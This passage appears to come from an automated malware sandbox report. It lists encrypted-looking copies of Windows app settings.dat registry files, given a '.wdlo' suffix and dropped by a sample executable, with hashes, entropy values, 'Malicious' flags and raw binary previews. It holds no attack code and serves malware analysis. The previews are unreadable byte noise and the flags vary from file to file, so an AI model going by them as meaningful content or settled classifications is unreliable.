                  SHA-512:4C1EE7A58F0D2394AD3659CF51D9A74048DB64C93FE3AE03D2A0FD37635693415E252FA21D8CECE726BB53E17AAB7461EC419810E061C0451076ED7EC4BA13BA
                  Malicious:false
                  Preview:regf...)...1......`R.O.e:cj.[."..CI.D4.......~.Gk...-...~x...~.^..2..}m.. .S.....9...=AUE....$Rl.o.....ka..`.W].(. ~aS..X.8g...{.|...2\.+.Y.t..&X.0.#...f.._..(k...{.2.y...............[........DX.v,....s..}.;......t*..Y.....#...B.Lw..N^...Q.:-..x.po.N.K.9....G..i.x...........k>0^.,......E.\{.....:..Y.|.p.C.._]....4..jP9..h2.....*.....<.{..c...4TjF.....(..k..>vCxz..C...,*..jc3j.=..D[.y........q.2..N...F4.=$.).{w.B...T.85...DP.....=o.,..^w...C.9.R9...."........&z..b...Y.v.!...J.C|......%.B.L.....?Z..v.g.]..'t.\..F.#...Ns.....g.].D. .1(|..O.CD......._.>,*L.]....X0...w.......[..L.d?u.V.L.0....@.9..E.Z........0.N~.:"...WV3....S.y_9..})AiHy..S.MQRL.o..}...z..v.t..s.e...Q...V.P.<o.W#....FT....a.23.....l-.7......l.....!..}t8.r...W.?..?D.'..hL']5.@.&.Z|{.R>.u..'.6....)Y.b2.R.!7._.4.........:+......I...f;..~>.WOa..%>.;N...tJ.. ../....j`Z.Dm...$t$G...7-.........c..i-F...%....X.J..+r-$sgw`C..P...Y.Qa}B.......l...iJ.k.....e*...&%......D....f....4*

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9788671059923715
                  Encrypted:false
                  SSDEEP:192:tLjhdI2lsB3Y1Q6Maa0AkuWE5w2wqQN3RhbZ6LaeJEhSpTrG8BY+:l3I2/1Q6Zef5wjBhZZeCcHVBY+
                  MD5:1A8A3BB071059E2818065793733F3087
                  SHA1:391002ED0F232115912426BD985C7F778E16263E
                  SHA-256:BE9D185F27893EE48B63BE91E20FF86424BF69A71487D09C8FBA2F21E2DCE757
                  SHA-512:CAAC54E39707DE3661B2976CADE451C16B2658C0222B693F124D35E8BCD0E0BD7F6EEE3C3186CE8277B561EB320E9D70264F66706A551630E2D19FD60E861E3D
                  Malicious:false
                  Preview:regf.B..\..65.m..?...MO..T>x%..=.O.x.4zxF.Lj.(..so...k..*Q...Z...J9#i6.#"...Y..cy^........;.....5..../r....>#..jh...3...~...........a.#/`.TQ..K,.d.b,.t*..;.E*.z.....*8..+....Q.?....Z.gz...!.....?...^.?.*..3.pB..h.S...V+...a.s.w..L#..A...O._..+bn..i*8.h...~.{r...;.................).O@.~.{..........65Fm.@m.[u...n.v.Gs.@q.{G......PW|.<...-..a`.C.0.......6.]1s.x$E.o..%(...;.*..|"f.u..1..G.B.5.....R.4..y..<...(.d.u.1.-.....:.tJ$.%...J@...}...e....&.....;.3w!..%Q..{&..6y.n#.........V.6J.L....?.......lUY...1_..?.;.\G<.m^R...*..w?_.TIv..,.O!..Vy...zeD..k.w.I.......,..m.Z.U..J.._Vj.....0..\..d.....n..."$I.k...C..^...}n.w..b.DD..o..rC..].s.kG.5.-Q..}.9..-ko..)..1..O..1..8,..#...?.(.D.o....G.Bn..a{.Lc..%i.kHMt\..Q...!.....G.4....4^|.......[m8X~Qg..-.C\;F8....+.?.....MY~.....O.~...|..EjF...Xf..-.N.....6......\.[.t..uu2..$.]..nf......yS..F......X..#=..|.^.#.M-......i.u.vz..w.Y.K(N.I..r.....<.PS. o.... ..vx^m.RE...cL../uo.y.....y..q.d..hfK.

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977075592989119
                  Encrypted:false
                  SSDEEP:192:miv7RGH4YATYxy32Fv7EEykRBvvtC9TphfN/JAr9vQdrD87v:mu7OATsyYQkV6/F/JAydrY7v
                  MD5:A8B366D0CF92DDB547BC1821CD7C3DDC
                  SHA1:17F5A48725D02B09953277B1BB95592BA9475DEC
                  SHA-256:297EF7F2528A8164A9594169CE3D0B60871588A8021D06B77F071E4A97F68EB3
                  SHA-512:1A039123B3D6B128ECEA93A96D49FB0AA6911249E8A31E4B50ECE4724AC51A269AECE177034FC8D30E9AEE4E7D74814C02874F9FDF916A673CF2C7F4B14CAA30
                  Malicious:false
                  Preview:regf.....4.. .b.H.F.Y..:5C.].U......G:..c....9Dj..c.(S..%..X.82..!...+........p.D..-.....-j..P.F..V.E.]....%..7........x..Z.>..Mt.......@.$oA.M....q......n(..}j.....u.B....>.m..\.)4I.$f1(...........).N(4c..n.$-...F..^]...!.xC%.n.........l$..q.....a..!X.J9..![./C.r..]..2.Gb...j!1W.".s.....E!Dm<v.f`..R..6q..7x.Q.*.RID..wA....X.D..:f..(....Eq...;.....l.p..Av.......u...P..{.M=X.,.O....R.....if.K......r....k:&..".-t....9|44....WF.JX.xM....|Wq..~Y...."....F$..yv.c...>0..7m\..-.&..._....b.].]..)..z..V.-6.w.Vce./I..t...!.f...h.3.M.Lg..N...e..!..B1..)..Zd...N.F..*D....|.."9.n....f.8+.......L...'.g...Z.....qh*..R(.My...k...W.....T.o.E.]...?l.s.nnJ.Cf.N?.*.....ko...O..} !.;q..#f.+.[?..dY..>\<..5.N..M...l..%%,..=.v.e...c..%J...BG..C.xO.RS... R......<.Z.....y2U3.'.H......j..1.1D.(.}..].[o'.(......z|.....]x.c.7.&....$a..>...0................vnz9~Q......{ah...........=[.Q.....;...i?^7..]^....)..........G. s^.d....@.w.pZ....;<...\.UP...{.W..

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97814107870259
                  Encrypted:false
                  SSDEEP:192:qUJ5PtFVAKeOPac2Z243FX7epPXLRGBgqydLR49ujbBJtsRotVNFwa:RLlFVmOd0x7epPLTqydLR4SbtFtVNWa
                  MD5:984609136F5B502B9FAA26D096D9BA1B
                  SHA1:F8C4CE8C662D5C568B2CE9F2AC2F50C6026AB67B
                  SHA-256:8D3B6407D81546CD678D820DF2C8299AE51B578C07A96369EED3859F78C37100
                  SHA-512:715F040988218F8A7E23D8AB3686277D39AF7BA8E7E22D4AB5C6E3E8C69671D0AD3390744E8F9282CEBF9EC8C5A5DD5DC4173E4AF16EFCA8CD7421BFE44DC97E
                  Malicious:false
                  Preview:regf.._y%|We:.N...>....p.}..=...^..%.;.x.......P.j........C..S5>..8..%....F...<........{.l.l..5....<..d.A.sJ49...d.`...n.........aJ.?KM]..6..co...,.&...aN.V......0S.Q. .3.....6.t..d..~=.G.I.b9g.T.wtT.5.+.:$......W..r|UQ....X...@Er0~"jSa.|#.eT.Q.......M..R.K.;.A.^.....31J.+M.Ns.@.8.J.z.[g.d.N^..U........q...q......T.|X.3.<...p....nf.g...*..0....c...]V.d..9d..#./..#..R...8...v.X4...{.,..p......2..=....H.O..B.T....e9..N8..i.>{....... u.$.r..........*......b..V...X..Ha.$q...[....k...(.6|..W.-Tk..=D..'..;.EL.....P....v..~T........R).X.'.e!G]f..o..3..H.3$..F.hp.....]..Q6...4~......p].....C1...`.c"..K....j.$..^/..............i.YT.......2.._...J....&...xL.]....}..wY7......O2.....y7.A..X.#......(...4..jr..lSKa......q...i.....{..G?.o.....;..;]....xO.....p....8.k$..N.`@CR.H..."W^1.[!.J....V.....3)...."`.,.v%.2jM..?.y..Gq3~.k..%.%c(.g....@.....Q...<...4.o..I".n.y.,.4...F....7:AV./..a.O$..v.x..%.l.(.....].^..Y`...Q.d.Q.C..eo....WC...J..

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977733253002105
                  Encrypted:false
                  SSDEEP:192:EHS95M/QndyDhEC9X++LfthQve+kUoLRwjoX6HSPUItNoLu0Sf32ZuUoi0K:EHS95gksKCtnOv3kUoLWhco7SfBtK
                  MD5:EE64E69509EF8ED912F99E5028361A76
                  SHA1:314D4F7EC5FEA6C26C67BE086CD0635D0F16DA0E
                  SHA-256:A85A314E292D6A526649AAFB203C11B71FE66D62A15CCE87F4BA6685234C9403
                  SHA-512:5E65D4CD7AB3191327C442176CB9C0141BDB993EABAEF11DF4D85CAC2C345C90D638CC3A222F74482F9521BA964B12238E2595B684EC4ECC14B4F73E44055B35
                  Malicious:false
                  Preview:regf..e...16..t.T.~...w|....c..0Q7...Z,.J:.;....".......L.u........}... ...N....{#.x[.{.t.t.... e.E...+...L.........\..k7.7.!.x..O#..F...........8......`.."(.....A.....t)..`.9......K.B....'$.....qLCxO...o<.....Q.4$zN..r....3....*.K.....Nd|.4..D.K......3O.|.4...d....7\.sp........dD...j=r.z.[H.e.8...S.....Z...].JL.M.jZ.2.r......H...$!..N...W.Z..w........o.9......T.:....n.B)9..3B...g.#.K.P.....Y..=}h..d..;.}h...2.r^..n.K.1.a{....]q.N5g..R.B..2o...o..w..At..]_T......s..=.j.M...E.7.....6.......W..T....w..x?N|.U.7?.y..~(..CX..w+.1..}.X..}p..=......M...M..c3^(.....n?.E.....Nx`g+C.....w..^..Oh.Z+..x .5.Ih.....1...3.^3.1...xy.|...-`.$....oudk..R.K.?.#......I,..^.].c0..V....g.8..V..~.._..x&@...(.t..M........@....G...&.|.....D{...=.U...8c.Q.+..t|...$Ag:...;LB..A+.S=.2B....(.S.b.D...}.........oq...D...rk....a.fa.>.j.J.R.."..C(...l!.Ox..c.!.....Y{..R....U....AQV...:).tV...2.7....m.#..S..N'Z...s..-.......1.....B.+.lI.4...j>..i.V2.........Xd....N..

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979872742335128
                  Encrypted:false
                  SSDEEP:192:Mwf1cxVqtepG/UU7ZvfwzCT6+t7C7uPSD3bsOEFfr:7fVpUOZJO+E70i3qr
                  MD5:046C6E5E41D38029D18382B028934D8D
                  SHA1:1FE065D1A1A297BC975D7440ADAA8B454D63B558
                  SHA-256:8A42B14519435DCC41F6C65E7509B653A96E26D3BC751A02E753DCC052AC0633
                  SHA-512:A8CD81734E4DF48049AE3293076292BBD793C25B135AC8DCB729AD9AE974F02F241C7FEFC3D9FDF65C608B20C6AF7398FB1637FA75E66A3F989F438A5C436BAF
                  Malicious:false
                  Preview:regf..!....)....-3^.o./..B.NMz..k.y$.c....I.N5o..6..2.5...... ....b...@../]}....mIW]..R..-,.+t7J..*.QZOW.)kmj.Rd..Q...Y.,.!.....t|..5.".4./.i!...'....ka*.z..l.....A...n....!IB@[.5..^.U..:1/HGFn.f...>..S).H:.Q...V.5r...F..3.2.3.Ey&.k....ME..bQ.......Q.q..L....m.....#w..R<..;.6....fP..%.W...`..A.H.H.......f ..4..\./..x.p|..1..=3.._.2..]...(I..("....kN|.F....[...;.N...S.3.&..SSZY.......{..:.........vN.K....&7Ep..e....:.<?..m.....TR...f.X....<.......r.9.....`!.....Mc.5....E.M/."..`K.#Kk1l].......]N.....,.v...m..\..&.*v_Gq....^"..n,...C...3E..j.*.-.V5n_..1.8J.........>/.eTr1/v.8...;..7....e......z.(<.....Yu...b.......R..y.N..h.|.....krI"t...-`....).=.Fb....=.X.....f.....u:/..:....Y.g.?..%..F..>.."...4..U..u.@.z....+:..G..c.hI.mp.VY.h..=.4...8..'.....8..).{.l4I.0.........?.F..T..*}%..&...2R.1-(..Zb..=e..88..G.....9....O..P......../....*p..b~..@}..T^..,.>...FA4.h....a..P.}3..+(%..:....Y....a. ~..\...8[1..xI..T.@8.&^.......=...._......5.b..S.

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):82254
                  Entropy (8bit):7.997761007961143
                  Encrypted:true
                  SSDEEP:1536:p5KXn1XvyBv54xZZLjbolra2hZnEIr8hOebPkyrWMzC0ennmkW17Z43E9Wv9xlmv:KFvyT4vZ3coCrrk1PCjmkUZvWv9xluJ
                  MD5:2A01EA245C6775B5035FE07F2FDCA5E8
                  SHA1:9A7DB591F5969CCDA5DE2AE3D2408151A71560CD
                  SHA-256:4516A967E95E3849741CF055B669D2CBE3247AD9263247FE3945A365AB5EA927
                  SHA-512:88DA7F0B6247AB2031BD63356994E7063E2CF55D77658E8B4C7D0B2DB080EE28E5953F560A1C54C6341FCD2C7A5AF9EA0589B8727FA46B83288E339BF3C7BFCB
                  Malicious:true
                  Preview:regf.......&_........D5.....F...d]..Il.8g...cl....x$|.;h......./f..6.4"x.*j.(...~!..d.....]*Fc....5...0..`h......Z...H.T.W..j"#G.7'...aw....#....'...yk.?....*.T+(...#.+.Q.0+s.Y...<.......@.P.':m<..to.....6?.-Z".@...pF.d.-O..D.%.'.U.3...s....`....@........S.g.G.8R...js*.PE...\.u..2...6I.......={.......aK".-.T....i.q.........?S..Z.%XV-..WEn..x\.&...G......bU..n.....HW.#.f..,.yn......U?...F`.t..N.z..K_.. ZJ..*28.h...y.|/........2.kB}.D....c...Z..G....sO. 1.:L.j.......gl`...M....#.M...tQ.g.d.f.....n...q..$wPPK.tu1.P..=.zZ..$~.j.u."_.........0qT..9.J.k?(:A.1%...%$....).=....A..f(..+....t.:.j7.....=..7_...-.\..B..t.{.S.xDwi...V..e2........-....X.....|..f_...j.....@M.X..1..T..!.A..oc.e..~e..iS...9...W...{@Y@.ZJD..&..n.Z.3.K..6.......U.e,.....y..'.{1....8^/.Y..}..3....|.w{9.K;.... .x..^GUF.`e.y4fx0.R!p`..P....!d.{...]Vf.xz9..W.F....t..0. |...D...'aj...T...Q`.6.J..0...H....M.n;......k..r.;..N..n-.-....{.......Y....f.j...pC..{C..HM..:...h.g.C<....

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):41294
                  Entropy (8bit):7.995649793206726
                  Encrypted:true
                  SSDEEP:768:CxE+MjfXYqIcV8piDkfMZ9SqyzAqToQIdV2mhf8kRGRd84QHO//+UviEeBuap:YobIvYsgb9SqbqzMUZd//+UviEWZp
                  MD5:B2363D084F5036F8149BF4C24E615A29
                  SHA1:3297B6FAE2014141910278EA6956387979932525
                  SHA-256:C209D81134B33FBF3B9E7ADDB4C912F0717BA624CCC689C2B763AE733070B5CB
                  SHA-512:9F134B324CEC93232F6B49018E6565E604D2BE354A09D5E2824E177E9E2BB9A8870BEF22D1122321ED5ABA504E2D65A754FDDBC889805D5953BE09C8CFCE6B0B
                  Malicious:true
                  Preview:regf.r.t.?.Z.%.$u0..~x..^...xq.T...D.~...6V.`.E.2..Qj.M.ae#S.W.ski.V.2.&...t...!.f2".Y....0..Q.9E...[.U....U.4.@:.9..v..R.M....._:A..a..V......7..T7...E..s=.Z...}8&O.........Z.........hw..n...^U5:..u..).....P....e.Pu....!L.....=*.....m.$......r.).uN"'...!..T.e.3..k..;.!Q......).O7..UU....4...../..5..9|....9.....v...4...w8....'o..P.-i.V.,j&...2...w..bg.|n..........J...P...........zF...k.TM........z 4.....8..Z..D..>....{./.J..7d.SK.".t(C......1y.Q....8..X.E.VM.u...S>..B.cc..._%l...kB.<wL...A}i...p..{.ql..~Q....l/.../..).C...8.=,..l.F.....]..,....~*.A...^i.d].a..fUQe..u.q.h....;.=.H..........1.T......eVg.*..<...m.@..l.O-...'.....K.X#}.l.k!.G*!..(.b..z%.h.@44.6....../.5.H..m.9O`.N........n.=...9....G..q..Q.X.5.L.x....'..;$...5@.\...Tr.....e.aB.{<...}.T...|.....j.n..qrFH..(@........q_.(Fs.+..Q.Q......=1A............Y...'K.wR.L....Sg...BlL.....*_.V...#y0......e..c.^#...{kg:j[...1\.0..+.T..1..q.j'&];n../.XK.d.....eo^D.B.|.).....&;#.?.M...."......

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):131406
                  Entropy (8bit):7.99867500041791
                  Encrypted:true
                  SSDEEP:3072:k69bfCGAXJkqbCVUC7pAYTRySG5wP5M8f/IG07AkK:Fz1ACqQAYdysP5Mgx0pK
                  MD5:3AA2A509E27127D9164ED0CC52985841
                  SHA1:C847441CA7E95F9D8EB4CCA48F9985EC881923FD
                  SHA-256:F044591CDAE430A1BABC744E34F3ABAF00032A53C9EB1E56A783A62BBFFA0FDF
                  SHA-512:E03A00C02DBF2BDF318E6062C58DA93ADB9C4EEBAB59ADC9B0F96162EF608CF96A01D69B7855D9F76C40F85D50C71AE599CB6C012CDD92E1A9CB38BECCC1E825
                  Malicious:true
                  Preview:regf...)..<.....=D..c_9.k..f..0.@....w..E..W...yu....C.....8....A6..%8....1+;.eU@R.(....D...Y....X....\Y......).I9i.~.'E..UD..Fn>......Q.<.1...|OH).....'.o#..L.Nk.V........&?N..q.....M.._.wx.....y'.x..yWS...$>.&.rA...U..Y....`*,.O..NSR..A...|..<.4..(Q.....v.i..XC...z?.....^0G[....]}.r..."D.k$...?...5.U.v...73YI.A.er.......P.|..w..L.HVU.G...|d._..B.).%!.W/V.......s...U.......W.]5o.....wt.Z.#7......,t]..f..<.u.5..0....Z..G...!.2.7OP......uK.O......[E.....obBO..d....VCv.p<..b;..R..Y.!...X(....NhC5.w...K?N}.<RW..X........`j.....e......&.r.a.!...zV.:.k...<.F.h..Kv._........o.......ft..&{...Q%x....h..L.q.b8Z........]Z.*...n..-:'......|..N.1..~...\..r...n..M...w8./......a..&..(.0_9u...0...,.,..l.K.|A+`.}ZaX.....%.$*......s.L;t...#....o.B...d.=1.u{...v...jJae..U.h.!.......6.rWf3z[D......<....".9a.. .V].O.Sn...|s.._.........[...M.ap....T.&......<..`..T..%.....>R&..=..8.`x..[....{.......H.........8j~.0.D.....3y.2.\WR183...w..gOD.?\.6+:..93

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9809985593036865
                  Encrypted:false
                  SSDEEP:192:aPBOg1wcJE5GMWggVoqwc2Qk2L1lSiUkL5L+BJ021anX8:aPkg15JE5VWboqeQjL1TUkL5ibInX8
                  MD5:810FB83F61908366708D892B78B9519F
                  SHA1:0D43F895D94C3255FD0D1F285BACB7406512A667
                  SHA-256:7C9B40868E12DF5D33B38DF41A21026F43C02616EF93A1712AA0A73ECB42DB2F
                  SHA-512:FFFBE3DD80B34EB3FA705547F2BDD7B97600BDC106DA3F05CC49F543FFD8C0E28861236A563265E03F4BD55F43D6C27ABA0AEFB5F7948211B3C7399217623A1A
                  Malicious:false
                  Preview:regf.."Wv.lJR.uV|..%=.ZZh.r.D..... .....gz.9U.{......}.:K..V.lHK.a.......b....uy..W.c.~. ..p..c[.d7.s....1.".A.*"..H......@...."G...%..~h..v.q..6.../z.L...O..b .k..,v'#.&O.d..Q.H.........2I..l[....A.nfq6..K.1.b.6.TP..=..c.R.F.I....Hm....sf.r..e;k.*.CJ-Ae.......X...v.../".[.<..HM...B.c.M..1./..K?....LT.F.o.Y..!x.~.^..i..,.iP.D.....s..tQ.'......R...?._s..i;.d..j.-H.od..S...-...Ya......Oi.}.o.*..CHT.T..]nd.$..e.Q.K...].<.|..w..`\A.`.K..0v...W......D.a..%2^....k....<.3'.hy~(.#N...3.8)c...>.\J1l..f{..x.%......lz>...G..Xz...ev.P;..5wO .N.n.B..8r.5... e2PG#..)...).z.=W.....6.E.R..s.;...x....6..#....p.....-..8....RvG.y.......t......Z....,s...--s....{.......C$)...h.38<2.. ..JP?...^..8..2XFBGC..O.....9..:o.....7...M..^.n.I..~..,...2.... .|lWp/`..#....._...C^..})..0......AH..L.,bK.........?/wz....~..).u..I..d. ..s.....#..A..tRe.L..8ii..I..........hpwn..~..99Rf....}..l.Zp.wx....p<.t.U6o0 ...Lj..A.[j..~..//.t$5l.A.a.x..-|e}..X2.....8}.n..

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977186677467208
                  Encrypted:false
                  SSDEEP:192:sWM00A+kU6ZAkvlqMONDzV3g6WlIaL5MHlNOayq:sWM09+oZAOEtzVw6WlZYn3
                  MD5:F40263CB13B15E9EEF1D9A804CDDD27A
                  SHA1:05F353320F718E854267A91F4EDC10F7659EB783
                  SHA-256:22B6201E2714C119BEE25054F3B204EFCB4EEC3D6B583F02F7233D2A8576A199
                  SHA-512:FF9EC18E1F58B8250BAD196003C86527998709867FF52631B74B6D20669B01F7AB50F7DFFC810C2C7D406DAFF520A5331E582E10255FDAF904D0E41B3F35F5E2
                  Malicious:false
                  Preview:regf..s..`..Cfz.d...f.Wy..T.*.."]...{......./E4.hDRC.U.3.L+.G#.(.j`.....;....H. ....&8.j...{p..v........6.....f....D.$._.q.qR..i...5v..a.q.^.&w.Y..k..H...V.r>.j.!.../..5......v.H.f.f...EO... .|..!i.Im.1>..|. .G.#.."..k.........T.ay.^.B...= .q.....~'q..<!]....D...u.b../.Z.k.._.jx........C.X..i_.y.Z9TF/.+]...v l...8.0t..[U.;...v.vg...5...:.......z..S..!....a.ge.|rt.HY{.P.......K..e..^..0(..po.P...........D......)...co..v-9..x+..B.{fE?Y.........QA......4..&...N. D.d.v..(8...,...l.6..~i%0..jq../.2...$.......o.j.X..PD.WMi J.....D...]..0..pHe.......Z.C.=.."..y-..).f..........:..M&-ph.A-..c...q.....V..s.....e.....|..`...K}.]...p.>..Z..g...L....._...D.......<hR=...:.a..d|.....G D}X.c.^....7.m+0.X....h.?!...Y.F.....:.S...........[...\..#.. .k.VgQ......H....e..e..;/l.9.q...kE.I.x_U....#m..$...1(0..&..c ..%=...u,.V.ab.5....Q...A....p..D..U...X...X....4.i._:........|...L...-`...V.o.N.Q..T...U.M.|CW...e..;....]..?vtl8..c.q.I.@...;.!._X..Dc....K\.n.

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9771665837957375
                  Encrypted:false
                  SSDEEP:192:hDrWMDfdOVZDs/uajnwopNkZjdtGa0RMzhH:xrWG2MumnwljEMFH
                  MD5:E1C36B29A7E9F61236D01C06DB1621B0
                  SHA1:DA482C47B9AB508FBC2BB5BED1FFF055486F4507
                  SHA-256:243FFBD2492418A17D1713E156FD65D67B3498BF083D7541DAE8AB63CF69FAF5
                  SHA-512:86E311E13D36D6E1E84178F8E7DBD6698FFD6D9E30AC1832AC1E037760214BBC5D82B993DBC8314E6AD0E0DB32885A811A8D83AC2E18F7FE6EC59BC64971A85B
                  Malicious:false
                  Preview:regf.2.#.RNax.R&|..Q..S...@.........nxpM.[*......6..R.W..3.1...E.SD....3[...[p]....O&hX.g....j.!.)...?.,kAml....X..Yj.j.....tK9D*.$./...=j<..t.N..{U....<(.*..i.sp.%L..z. .,)B......C.4..Y&..>K.\.....}....p..M...Ks..sG"e.,.W.2'.u.n/..C...J.}.c0..dm.z..8.....o...X<p.cH...a...|.'.$.R....I.k...h."bY.b.N.H...c...q...3F.D...7.k...8.3...Y...W...+JXP...5..)\.%.e...eqG.5b5.L.P..M. M]N..w}...t....d*..l.QS.g...u...}K.....ATM..b..j.A.>...9k.o...Z..$..............\w...S.43.N\....k..(Q>c..>..2V..%i W:..:..............g..fx...w.7..O.:B..._/13'Qk..5..Zc..%.....1.q.W.5..>.&....L5e........>Y;-..;Zn..bL...*8m...?b.......T\.R..$.Z'?W ............X.e._HZp.H?_j..e.b....m*..,....'wR.6X..3g.....5.I)..k6O..=..H../;..-.j....o......o'.S.o.z0km_..pb[...CCF..&.........\.W.3..R.....N.D..=D...4.?..... .....5&w............t.#.....N.j$7U..h.n.k/.....L.../.u9!....I....h..#.ZX..:.w....S..`\.:s.v..<...p.|7.....\..:..CYU=/3...&C.pOo.t...j.Jh.|.+..P....`p.0.1...1....P...j..D(.Q.>

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.976619663241203
                  Encrypted:false
                  SSDEEP:192:OSeZFo6KB6KkG/Gq47NzxriKjt+SHgMUnlesk/HDlJVH:OSb6l3Geq4lEkttH3/H3R
                  MD5:A756ED786579C63C16F9B8E03A67524E
                  SHA1:19BE267994B70AB0D3EF52F2B1725B149F8C2565
                  SHA-256:F81B8EA88C7D7AB362C13DEC5E8A4E14D85FF58AF4E20C54AB0FE1B877F3F994
                  SHA-512:91E1D37DF99A55B120B906C35CAFE3FD3234BC6E412AB27C026B3CB1A8F814F13A9935300ADE9E8E889FDF8F848D40C1843C02651FE0818C84C32FB9360B99D9
                  Malicious:false
                  Preview:regf.L..Q.Q.xF..y..i.+4...H....Q.v..W."v.?..E.$w<dd8.g...ey.:....H..*../...t.....R.........C/.d......\a.G.qB.%..#......H..;.7.V..r.w.'?.>.t3...2a..p6p.....wvs.v`....xKU...K+.H....C...=O.0%...x.rfb...%.^.....d..>u....l..O..*...e.....".P...vZ&}3X...A.......]{._...'!a."{..dS..GAJ\6'.Os..i.D.....?.qK.,bt...O.N.1\.. ..y.......n{.D=P..h.....{..j.b...X...t}Y].`.H.y{.J..{(p....z..RF?;.X..@?....w5X,...[./.c.,?.)..l5_"..E.Sa]0y#HG../..)...f.h.duCjz.....M.G...(s..T..J...ux..q....~/...s......%....A..aZ.*...B....>..l>..c..7.D2..S...t.....).!.P..4.W...h..j-Y\=..*.z.!.@.J.....ug..gM...4.O...<..8.!...$..}....#{.q...hX'.,mt.5.O0.O4..y[.4i...`.=..Wf./..{..r..N..pv.}|"z..{c.5.b.NQ~0G.j.6@..!<..j..t..fXT...C.........G.!@..0Z..C>f3$.0... %.c=.U..:.".......2k......{tU..U......p+l=..Av......d.+....K`z.o...bH.@.....-...k;..GlI..8e..S.MH.0r..........U$.Yj...u&v.F.{.f.](.8..]B.....~..t4.....l.Hy.".....:..<...a.......q..~.6..)..].y.....(,.Wp,p........*.jvn...'

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978171139957578
                  Encrypted:false
                  SSDEEP:192:Ykp330eG/YrPvn0+XfICIqF4lqWRpgPnjO7Qx6Ci1VH5hJ4Y5:7SedvICIg5W/4nmL77V
                  MD5:56841ABC599B945EFE31C39B8A21ED32
